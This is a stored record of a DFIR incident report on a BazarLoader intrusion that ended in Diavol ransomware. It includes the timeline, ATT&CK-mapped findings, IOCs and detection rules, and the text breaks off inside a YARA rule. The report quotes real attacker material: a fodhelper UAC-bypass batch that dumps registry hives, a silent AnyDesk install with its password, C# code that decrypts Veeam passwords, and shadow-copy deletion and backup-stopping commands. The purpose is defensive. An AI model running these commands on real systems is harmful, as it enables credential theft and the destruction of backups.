{ "id": "6ee4e026-682d-4678-bffe-361bed698e3b", "created_at": "2026-04-06T00:10:47.574205Z", "updated_at": "2026-04-10T13:11:23.243394Z", "deleted_at": null, "sha1_hash": "3b407c56de2595ffddfc27a8e91ce2ded96d9b18", "title": "Diavol Ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2850511, "plain_text": "Diavol Ransomware\r\nBy editor\r\nPublished: 2021-12-13 · Archived: 2026-04-05 14:30:14 UTC\r\nIn the past, threat actors have used BazarLoader to deploy Ryuk and Conti ransomware, as reported on many\r\noccasions. In this intrusion, however, a BazarLoader infection resulted in deployment of Diavol Ransomware.\r\nFirst discovered in June 2021, by FortiGuard Labs, Diavol Ransomware has been suspected to be linked to the\r\nWizard Spider threat actor. In this report, we observed threat actors deploy multiple Cobalt Strike DLL beacons,\r\nperform internal discovery using Windows utilities, execute lateral movement using AnyDesk and RDP, dump\r\ncredentials multiple ways, exfiltrate data and deploy domain wide ransomware in as little as 32 hours from initial\r\naccess.\r\nCase Summary\r\nThe malware (BazarLoader) was delivered to an endpoint via email, which included a link to OneDrive. The\r\nOneDrive link, directed the user to download a file that was a zip, which included an ISO inside. Once opened\r\n(mounted) on the users system, it was determined the ISO contained a LNK file and a DLL. The LNK file\r\nmasqueraded as a Document enticing the user to click/open it. Once the user executed the LNK file, the\r\nBazarLoader infection was initiated.\r\nAs seen in previous cases, the BazarLoader infection began with internal reconnaissance of the environment using\r\nWindows utilities such as net, nltest, and ipconfig. After being inactive for one hour, the intrusion continued with\r\ndropping of multiple Cobalt Strike beacon DLL’s on the beachhead. This was followed by another round of\r\ndiscovery from the compromised machine. The threat actor then proceeded with execution of adf.bat, which is a\r\nscript that queries various Active Directory objects using the AdFind tool. The first run was using a renamed\r\nbinary named qq.exe and then the threat actor later dropped a properly named AdFind binary and executed the\r\nsame discovery commands again. Soon after that, with the use of another simple batch script named\r\nfodhelper_reg_hashes.bat, they performed credentials acquisition via dumping of SAM, SECURITY and\r\nSYSTEM registry hives.\r\nReturning after a gap of almost 18 hours, the threat actor performed another round of network scanning from the\r\nbeachhead. This was then followed by attempts to Kerberoast and “AS-REProast” using the tool Rubeus. The\r\nthreat actor then moved laterally via RDP to a server that contained file shares. After gaining access to the system\r\nthey installed a remote access application, AnyDesk, as well as Filezilla.\r\nThe threat actors used FileZilla to exfiltrate data out of the environment. They then pivoted towards critical\r\nsystems, such as domain controllers and a server that held backups. The threat actor then dumped LSASS from\r\none of the domain controllers, using task manager, and then uploaded the dump file to ufile.io using Internet\r\nExplorer.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 1 of 38\n\nOn the backup server, the threat actors attempted to dump databases associated with the backup solution. In one\r\nattempt, they used a documented technique to recover the encoded password and decode it using the Microsoft\r\nData Protection API (DPAPI).\r\nAfter around 42 hours post initial intrusion, the threat actors pushed towards completion of their final objective.\r\nRDP access was established from the central file server that the threat actors had compromised to all endpoints\r\nand a batch script named “kill.bat” was executed on all of the targeted machines.\r\nThe script consists of commands that removes Volume Shadow copies, disables Windows automatic startup repair,\r\nand stops all the running services on the host. Once the script completed execution, the Diavol Ransomware was\r\ndeployed via the RDP connection on each machine by running the executable manually. From initial access, to\r\nransomware deployment, the threat actors took about 42 hours to deploy ransomware domain wide, but from the\r\nlogin on the third day, to the last host ransom execution, only about an hour passed for the actors to finish their\r\ndeployment.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such\r\nas Cobalt Strike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and\r\nothers can be found here.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs\r\nincluding Sysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 2 of 38\n\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 3 of 38\n\nAnalysis and reporting completed by @yatinwad and AnonymousContributor1\r\nReviewed by @tas_kmanager and @samaritan_o\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial access was via a OneDrive link that arrived via malicious emails that was reported via @ankit_anubhav.\r\nUpon accessing the link, a zip file was downloaded.\r\nThe original URL of the file can be traced from the file stream log data (Sysmon Event ID 15) as well.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 4 of 38\n\nReviewing the file stream data from Sysmon we can see that the zip contains an ISO file.\r\nTheAnalyst reported similar BazarLoader activity via malicious emails around the same time frame.\r\nExecution\r\nThe BazarLoader ISO downloaded from the OneDrive link, consists of a malicious DLL and shortcut file named\r\n“Documents.lnk” which executes the DLL via rundll32.exe.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 5 of 38\n\nAfter the initial execution, the malware contacted two of its C2 IPs:\r\n159.223.31.75\r\n206.189.49.239\r\nWe then observed threat actors dropping multiple Cobalt Strike Beacon DLL’s on the host in the following file\r\npaths:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\tfpkuengdlu.dll\r\nC:\\ProgramData\\temp.dll\r\nC:\\Users\\\u003c\u003e\\AppData\\Local\\Temp\\uvvfvnnswte.dll\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 6 of 38\n\nPersistence\r\nA new BITS job, named “Microsoft Office Manager upgrade v24.24” was created on the beachhead host.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 7 of 38\n\nThe BITS job failed because the requested URL does not exist.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 8 of 38\n\nWhile reporting failure in the logs, the BITS job did re-execute the mounted ISO files every 3 hours, for the length\r\nof the intrusion on the beachhead host.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 9 of 38\n\nAfter the threat actor moved laterally, we observed them installing Anydesk on multiple clients to create additional\r\nmeans of keeping access.\r\nThey used PowerShell and cmd to automate the download and installation of AnyDesk. In order to install Anydesk\r\nfor unattended access you have to set a password. The password here was set to J9kzQ2Y0qO\r\n(new-object System.Net.WebClient).DownloadFile(\"http://download.anydesk.com/AnyDesk.exe\", \"C:\\ProgramData\\AnyDe\r\ncmd.exe /c C:\\ProgramData\\AnyDesk.exe --install C:\\ProgramData\\AnyDesk --start-with-win --silent\r\ncmd.exe /c echo J9kzQ2Y0qO | C:\\ProgramData\\anydesk.exe --set-password\r\ncmd.exe /c C:\\ProgramData\\AnyDesk.exe --get-id\r\nThe threat actor not only leaked their password when installing AnyDesk, but they also temporarily copied the\r\npassword to the machine as the name of a text file.\r\nThis password also matches one from the leaked Conti manuals back in August.\r\nFrom the Anydesk logs, we can also see the Client-ID and the IP used to access the clients. Logs can be found at\r\n%programdata%\\AnyDesk\\ad_svc.trace\r\nIP: 23.106.215.31, Client-id: 903491377\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 10 of 38\n\nDefense Evasion\r\nThe threat actors made use of process injection through-out the intrusion. The BazaLoader malware injected into\r\nan Edge browser process, as observed by the discovery activity, and Cobalt Strike DLL’s activity.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 11 of 38\n\nCobalt Strike processes were also observed injecting into various other processes.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 12 of 38\n\nCredential Access\r\nThreat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using a batch script named\r\n“fodhelper_reg_hashes.bat”.\r\nContents of fodhelper_reg_hashes.bat are as follows:\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"reg.exe save hklm\\sam c:\\ProgramData\\s\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\nfodhelper.exe\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"reg.exe save hklm\\security c:\\ProgramDa\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\nfodhelper.exe\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"reg.exe save hklm\\system c:\\ProgramData\r\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\nfodhelper.exe\r\nreg.exe delete hkcu\\software\\classes\\ms-settings /f \u003enul 2\u003e\u00261\r\nThey also performed enumeration of the web browser information using more.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 13 of 38\n\nThe following files were accessed:\r\nUsers\\\u003c\u003e\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data\r\nUsers\\\u003c\u003e\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Cookies\r\nC:\\Users\\\u003c\u003e\\AppData\\Local\\Temp\\edge-cookies.json\r\nUsing a well known technique documented on the Veeam backup forum, the threat actor managed to decrypt\r\npasswords used by Veeam. The encryption method used by Veeam is Data Protection API/DPAPI.\r\nAll the activity was done using RDP on the server with backups.\r\n1. Dump the credentials using sqlcmd.exe to base64 passwords.\r\n\"C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\sqlcmd.exe\" -S localhost,51341 -E -y0 -Q\r\n2. Via RDP and notepad, they created a new file containing the code for the decryption routine.\r\n\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Windows\\Microsoft.NET\\Framework\\\u003cversion#\u003e\\veeam1.cs.txt\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 14 of 38\n\nContent of veeam1.cs.txt\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Security.Cryptography;\r\nusing System.Text;\r\nnamespace Main\r\n{\r\ninternal static class Program\r\n {\r\n private static void Decrypt(string b,string a){\r\n if (string.IsNullOrEmpty(a))\r\n {\r\n return;\r\n }\r\n byte[] encryptedData = Convert.FromBase64String(a);\r\n Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectio\r\n return;\r\n }\r\n private static void Main(string[] args)\r\n {\r\n Decrypt(\"VATA\",\"\u003cBASE64 ENCODED PASSWORD HASH\u003e\");\r\n }\r\n }\r\n}\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 15 of 38\n\n3. Execute, which gave the threat actors passwords that were used by Veeam.\r\nc:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe veeam1.cs.txt\r\nWe also observed the threat actor using Rubeus to kerberoast and asreproast the environment.\r\nDiscovery\r\nBazaLoader was observed executing the well known battery of Windows discovery commands around 10 minutes\r\nafter execution on the beachhead host.\r\nnet group /domain admins\r\nnet group \"Domain Computers\" /domain\r\nnet localgroup administrator\r\nnet view /all\r\nnltest /domain_trusts /all_trusts\r\nShortly after the Cobalt Strike beacon was executed, we can see that they uploaded and ran the well known script\r\nadf.bat. This has been observed multiple times by different ransomware groups. The threat actor ran AdFind twice,\r\nonce using adf.bat file with AdFind renamed to qq.\r\nqq.exe -f \"(objectcategory=person)\"\r\nqq.exe -f \"objectcategory=computer\"\r\nqq.exe -f \"(objectcategory=organizationalUnit)\"\r\nqq.exe -sc trustdmp\r\nqq.exe -subnets -f (objectCategory=subnet)\r\nqq.exe -f \"(objectcategory=group)\"\r\nqq.exe -gcb -sc trustdmp\r\nThe second time, they copy/pasted commands from adf.bat and executed them with AdFind.exe.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 16 of 38\n\nOn the second day, the following commands were executed before they started working on moving laterally in the\r\ndomain.\r\nnet group \"Domain Admins\" /domain\r\nwhoami\r\nnslookup\r\nipconfig /all\r\nsysteminfo\r\ntasklist\r\nnet group \"Enterprise admins\" /domain\r\nnet localgroup administrators\r\nwhoami /all\r\nnet use\r\nquery user\r\nDuring the course of the intrusion, we observed execution of the utility “Advanced IP Scanner” to perform\r\nnetwork scanning (over ports 21,80,445,4899,8080).\r\nAdvanced IP Scanner was downloaded using Internet Explorer on a server:\r\nand then run with the portable option:\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 17 of 38\n\nWe also saw “MSSQLUDPScanner.exe” used for discovery of MSSQL instances across the environment.\r\nWe believe the tool used is rvrsh3ll’s MSSQLUDPScanner\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 18 of 38\n\nComparing compiled version to executable from this intrusion\r\nBefore execution of AdFind.exe, adf.bat was run.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 19 of 38\n\nVia RDP they manually ran @carlos_perez‘s Invoke-Sharefinder.ps1 on a server. It then looks like they manually\r\ncopied the output to a file named shares.txt.\r\nAfter each RDP connection to a server on the second day, the threat actor also made sure to open up task manager\r\nto review running processes and possibly logged in users on these systems.\r\nLateral Movement\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 20 of 38\n\nWe observed the threat actor using RDP as their main tool to do lateral movement in the environment. Most likely\r\nusing credentials gathered through dumping of either lsass, or the registry hives. The first instance was through the\r\nbeachhead where they used Cobalt Strike as a reverse proxy. This also revealed their Workstation Name which is\r\nWIN-799RI0TSTOF .\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 21 of 38\n\nAfter they installed AnyDesk, they used that access to RDP to other servers in the environment as well as\r\neventually executing their final objective using this access.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 22 of 38\n\nCollection\r\nThe threat actors attempted to dump a database using sqlcmd.exe but the connection to the MSSQL server failed.\r\nsqlcmd -E -S localhost -Q \"BACKUP DATABASE master TO DISK='c:\\programdata\\sql\\master.bak'\"\r\nCommand and Control\r\nBazarLoader:\r\n206.189.49.239:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: 3f48aac872b1dbe54fa3547535ec9d43\r\nCertificate: [3d:c3:4b:ff:95:d0:ae:52:f3:1e:18:e2:18:9e:0b:38:8c:f0:cf:b9 ]\r\nNot Before: 2021/10/18 14:47:32 UTC\r\nNot After: 2022/10/18 14:47:32 UTC\r\nIssuer Org: Akdeniz Ltd.\r\nSubject Common: turkcell.info\r\nSubject Org: Akdeniz Ltd.\r\nPublic Algorithm: id-ecPublicKey\r\nCurve: prime256v1\r\nSubject: \"emailAddress=goodmanshannon@stewart-cook.com,CN=turkcell.info,O=Akdeniz Ltd.,L=\\\\C3\\\\83\\\\C2\\\\87orlubu\r\nIssuer: \"emailAddress=goodmanshannon@stewart-cook.com,CN=turkcell.info,O=Akdeniz Ltd.,L=\\\\C3\\\\83\\\\C2\\\\87orluburg\r\nValidation_status: \"self signed certificate\",\r\n159.223.31.75:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: 3f48aac872b1dbe54fa3547535ec9d43\r\nCertificate: [be:b3:98:a3:a2:ce:e0:63:0b:7a:02:34:13:5b:0a:b5:4a:a4:21:71 ]\r\nNot Before: 2021/10/18 14:47:32 UTC\r\nNot After: 2022/10/18 14:47:32 UTC\r\nIssuer Org: Şafak Fırat Ltd.\r\nSubject Common: masomo.com\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 23 of 38\n\nSubject Org: Şafak Fırat Ltd.\r\nPublic Algorithm: id-ecPublicKey\r\nCurve: prime256v1\r\nCobalt Strike C2:\r\nhiduwu.com\r\n108.62.141.87:443\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [a5:4e:ed:32:cd:76:a3:97:6b:ad:a1:df:42:36:6d:38:54:4c:a5:4e ]\r\nNot Before: 2021/09/29 00:00:00 UTC\r\nNot After: 2022/09/29 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: hiduwu.com [hiduwu.com ,www.hiduwu.com ]\r\nPublic Algorithm: rsaEncryption\r\ngawocag.com\r\n23.81.246.32:443\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [32:be:aa:28:c6:bc:f3:f6:cf:31:c5:e5:2a:bf:1a:c1:a4:70:d1:6b ]\r\nNot Before: 2021/10/11 00:00:00 UTC\r\nNot After: 2022/10/11 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: gawocag.com [gawocag.com ,www.gawocag.com ]\r\nPublic Algorithm: rsaEncryption\r\n{\r\n\"x64\": {\r\n\"sha256\": \"0cb20cf74f9c5896442c82f875e9221cae606ffa124e53d013b8d13b6988f8cc\",\r\n \"uri_queried\": \"/fVWJ\",\r\n \"config\": {\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Watermark\": 1580103814,\r\n \"C2 Host Header\": \"\",\r\n \"HTTP Method Path 2\": \"/sm\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 24 of 38\n\n\"Method 1\": \"GET\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Method 2\": \"POST\",\r\n \"C2 Server\": \"gawocag.com,/nd\",\r\n \"Jitter\": 10,\r\n \"Port\": 443,\r\n \"Polling\": 5000\r\n },\r\n \"sha1\": \"72db453ad1ab5ea483e5046864f3a8c295e7fef4\",\r\n \"time\": 1634637833485.8,\r\n \"md5\": \"abd213722fae891f54c28640d751200f\"\r\n },\r\n \"x86\": {\r\n \"sha256\": \"b08ae2fec4c0c64113947c14d9ab6f4a3e61a9d60e182b59e20b5b3606df8569\",\r\n \"uri_queried\": \"/C5jz\",\r\n \"config\": {\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Watermark\": 1580103814,\r\n \"C2 Host Header\": \"\",\r\n \"HTTP Method Path 2\": \"/sm\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"Method 1\": \"GET\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Method 2\": \"POST\",\r\n \"C2 Server\": \"gawocag.com,/nd\",\r\n \"Jitter\": 10,\r\n \"Port\": 443,\r\n \"Polling\": 5000\r\n },\r\n \"sha1\": \"f3003f34c9cb595e94fa632b537bf5a76869954d\",\r\n \"time\": 1634637826726,\r\n \"md5\": \"3303703eef699663fd3f0982922e8e30\"\r\n }\r\nExfiltration\r\nOn the second day of the intrusion, FileZilla was installed on one of the servers which used SFTP to exfiltrate data\r\nto a remote computer at IP address 192.52.167.210.\r\nUsing Netflow, we were able to confirm that some amount of data (~200MB) was exfiltrated out of the\r\nenvironment.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 25 of 38\n\nHere we can see the threat actor actively exfiltrating our information using FileZilla.\r\nWe also saw the threat actors exfiltrate databases by dragging and dropping information into FileZilla.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 26 of 38\n\nAfter pivoting to a Domain Controller, the threat actors dumped lsass using Task Manager:\r\nAnd then uploaded the dump file to ufile.io using Internet Explorer on a server. Eyes on Apple iOS 14.6\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 27 of 38\n\nImpact\r\nOn the third day, the threat actors began their final actions. The final actions took place from a compromised file\r\nserver. They began with a ping sweep to locate all live hosts. After that completed, they reviewed the results on\r\nthe host.\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 28 of 38\n\nFrom a file server, the threat actors then established RDP connections to all the machines in the environment.  The\r\nthreat actors transferred 2 files onto the machines they connected to. A batch script named kill.bat and a\r\nransomware executable CryptoLocker64.exe.\r\nThe batch script is responsible for deletion of volume shadow copies, turning off automatic repairs and stopping\r\nall the running services on the host. Some of the commands are as follows:\r\nsc config \"Netbackup Legacy Network service\" start= disabled\r\nbcdedit /set {default}\r\nbcdedit /set {default} recoveryenabled No\r\nvssadmin.exe Delete Shadows /all /quiet\r\nwmic.exe Shadowcopy Delete\r\nnet stop \"Zoolz 2 Service\" /y\r\nnet stop \"Veeam Backup Catalog Data Service\" /y\r\nnet stop \"Symantec System Recovery\" /y\r\nnet stop \"SQLsafe Filter Service\" /y\r\nnet stop \"SQLsafe Backup Service\" /y\r\nnet stop \"SQL Backups\" /y\r\nnet stop \"Acronis VSS Provider\" /y\r\nnet stop VeeamDeploySvc /y\r\nnet stop BackupExecVSSProvider /y\r\nnet stop BackupExecRPCService /y\r\nnet stop BackupExecManagementService /y\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 29 of 38\n\nnet stop BackupExecJobEngine /y\r\nnet stop BackupExecDeviceMediaService /y\r\nAfter completion of this activity, the ransomware binary was executed manually over the RDP connections.\r\nFrom the threat actors starting their ping sweep, to final host encryption, about an hour passed leaving behind the\r\nransom note for the organization to find. The threat actors went from initial access to domain wide ransomware in\r\njust under two days.\r\nIOCs\r\nNetwork\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 30 of 38\n\nBazarLoader\r\nturkcell[.]info\r\n159.223.31[.]75\r\n206.189.49[.]239\r\nCobalt Strike\r\n23.81.246[.]32\r\ngawocag.com\r\n108.62.141[.]87\r\nhiduwu.com\r\nSFTP Exfiltration\r\n192.52.167[.]210\r\n23.152.0[.]22\r\nFile\r\nBazar\r\nDocuments.lnk\r\n4d8af5ba95aa23f7162b7bbf8622d801\r\nd5b8c1a219686be5b75e58c560609023b491d9aa\r\ne87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162\r\nSharedFiles.dll\r\nfb88f4d22f14ca09ddeeca5d312f4d9f\r\n734205a694689db504418101b91c9981e3a12deb\r\nc17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299\r\nCobalt Strike\r\nuvvfvnnswte.dll\r\n69c68c62844966115c13dfee2e7bc58c\r\n7f49ecaebe1c59c09587cee25fb8844c78a78665\r\n5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d\r\ntmp.dll\r\n56c552097559ecbafedd5683038ca480\r\ndc0699b1d1c5a99b75334b69dafce5fe86bcf6a3\r\n493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54\r\nTools\r\nAdFind.exe\r\n9b02dd2a1a15e94922be3f85129083ac\r\n2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a\r\nb1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682\r\nRubeus.exe\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 31 of 38\n\n6798ff540f3d077c3cda2f5a4a8559f7\r\n40e8b04603f168b034c322be6c8b0afa5a9e89ac\r\n0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb\r\nfodhelper_reg_hashes.bat\r\n1e81900cc66fde050aef4c3149f1a375\r\nf334b1b95f315f994c82da572e7acb68df4b17ed\r\n9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271\r\nMSSQLUDPScanner.exe\r\ne6bef068c93cacdae7f15eded63461da\r\n0390eacb29a580adf9870dbd3412f91d984a3197\r\nbc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730\r\nveeam1.cs.exe\r\n32d6f85c93bad9fa0f3eda1a8e80016\r\n6e7628cd11dc76835e8cc0b2a91dc38101fcdb90\r\n07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d\r\nAnyDesk.exe\r\nbd1c7369830ebd781ed5eade64f8f9e4\r\n4f65118960bd8bcc744d62e6f464f8bc82c85a9e\r\n4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7\r\nFileZillaPortable.exe\r\nb56f93850ad1ba921d56fbfc0f6950ca\r\n6bb01635f68264afb77268dedd4e3ca3125e8c37\r\n3c53ccee435994cd8125be4ba09cd47dd64a3ffac00cce49327851541c50620\r\nDetections\r\nNetwork\r\nSnort:\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET INFO Packed Executable Download\r\n[1:2850280:1] ETPRO TROJAN Observed Malicious SSL Cert (BazaLoader CnC) [Classification: A Network Trojan was De\r\nSigma\r\nRule generated by @0xThiebaut‘s sigmai project\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 32 of 38\n\nAdFind Usage Detection\r\nGrabbing Sensitive Hives via Reg Utility\r\nCredentials Dumping Tools Accessing LSASS Memory\r\nSuspicious Reconnaissance Activity\r\nStop Windows Service\r\nAnyDesk Silent Installation\r\nRubeus Hack Tool\r\nYara\r\n/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2021-12-12\r\n Identifier: files\r\n Reference: 8099 https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule uvvfvnnswte {\r\n meta:\r\n description = \"8099 - file uvvfvnnswte.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d\"\r\n strings:\r\n $s1 = \"(s#u%x0m(m#n\u0026y*r$o\u0026k\\\"j*o$y\u0026x\\\"k)l#k%y!l)y#u%j0m%v0w)w.n%k0q)l.o\u0026p/s*m-p\u0026u/m*v.q+j%o\u0026s%r+w%y\u0026p%s,t\u0026\r\n $s2 = \"0w(r#v%l0j(l$u\\\"o*u$n\u0026p\\\"v*p$x\u0026k!q)k#j%r!x)v#t,y.k%y0v)t.r%l0p)w-m\u0026o/r*n-t\u0026r/l)m%w+m%n\u0026x%n+x%x\u0026s\u0026y,\r\n $s3 = \"%r0v(y#p%k0k'w\u0026m\\\"p*t$m\u0026v\\\"y*q$k%w!n)j#q%l!w)w.o)y.l%x0u)j.u%m0s*k-j\u0026n/y*x-s\u0026s0w\u0026u%x+l%m\u0026n%q+y%k%o\u0026\r\n $s4 = \"#t%s0u(j#o%j/x$p\u0026j\\\"q*w$v\u0026y\\\"x*r#l%x!o)q#r%k!v(l0x)v.m%s0n)m.t%v/t*l-k\u0026m/j*w-r%p%p\u0026r%y+o%v\u0026q%p+j\u0026l%\r\n $s5 = \"#s+r+y+x/o#k,q$l$t%q0x$u.s*j,s0l(r\u0026r,u0y*p%s!y-y%v'l\u0026v%l%o-q+o%s!k-m)l!p-n!r(q(l.t)p\\\"o+s%k\u0026v'j*v#w\r\n $s6 = \"%y\u0026u\u0026x!s%k%t%j%m\\\"p\u0026m\u0026k%o%n\\\"m%l\u0026v%t%s\\\"r%q\u0026u%y,l/o)u+p0q)y)p)q)r-y)m+x-o,u,t/u*s,n+l+k0j,t,m+q+t0w\r\n $s7 = \"-r#u\u0026p.w+l#r,o%w%x%y$n%y-j,u$y(y,s,r,y$w%n-n%v-q)l%l%q%p-r!o/n+k\\\"r,q)q#r!s(o%l#p\u0026s\\\"r.n*q\u0026q.k*u#y+\r\n $s8 = \",j/j#t(v+l#s.s%w%x%y0x$o%v%u-x,j0t$j/m+n%l$k!k\\\"l+t-q!p-x\u0026y+v/l%q%s%r0n'v%w%v\u0026m,u$w+y+r+s*s*r*q*p*o\r\n $s9 = \",n0m%s$s(j0n(q#m*v0p.x0q't0w)v)x)y/m-s(y%o\u0026m%n,w0t/l#x(r*k+p)k%p0k,v(k$w!t%j*w#x,k(o!y%y#w,j\\\"l\u0026s(w\r\n $s10 = \"(l/j#l0u$t/n$x0y!p0n$v(k\u0026w,p,t,t,s$w(y-u*u!o,q%m%k%j,r\u0026m0l.s%t%t,p)u-v,o\u0026s$j)s+w%n0l-t\u0026q\u0026o/w%y\u0026t\u0026s\r\n $s11 = \"/k#u'u)x0l'y(y0t$l\u0026v*y%s+j$t#p,t,s$w(y-u,o%m\u0026p0p.w%j%q+w%q(q)u-y)s$v%m-o)o+n!l-t+x+y.n*x+t,y\u0026s's*s\r\n $s12 = \"\u0026q+v.s)m/v#y%w,q,x$o/q,q,o,n,n!n0n.y0u$o%t%m)t%w-o%p%p%p%o,u)l%o-v(k%x%x%w)u\\\"p)o+x+x\u0026q\u0026p,v+u\u0026u\u0026t\u0026\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 33 of 38\n\n$s13 = \"+s+r/q*o*j0l,y,j,k-n+w0x$r,k.x,p,u,r0q)o%o-r%w-k(x%j$l%y!w-y)n+l$p\\\"q%y%x.w0o\u0026y\u0026l\u0026k\u0026j,y0x%q\u0026n\u0026u\\\"l\r\n $s14 = \"+s%j/t)s+w+v(y!u,j,j,q,p\u0026w)x*v,t,s(n(m0p$p,s,x+p%m%j)n!x-x%k,p+x%u%r!m#w)y!k\u0026j*l\\\"m\u0026y%q\u0026l*o\\\"v.j*u\r\n $s15 = \"/v*u'y*w(y*y(t\u0026t-x%y%r%s0w$q(y)l(t(n(m0p$x\u0026j'u0u\u0026p%j%q%p+w\\\"n)l%t%s-w)y$t%t0o\u0026p\u0026l\u0026k\u0026j*t(y\\\"n/v\u0026t\u0026t\r\n $s16 = 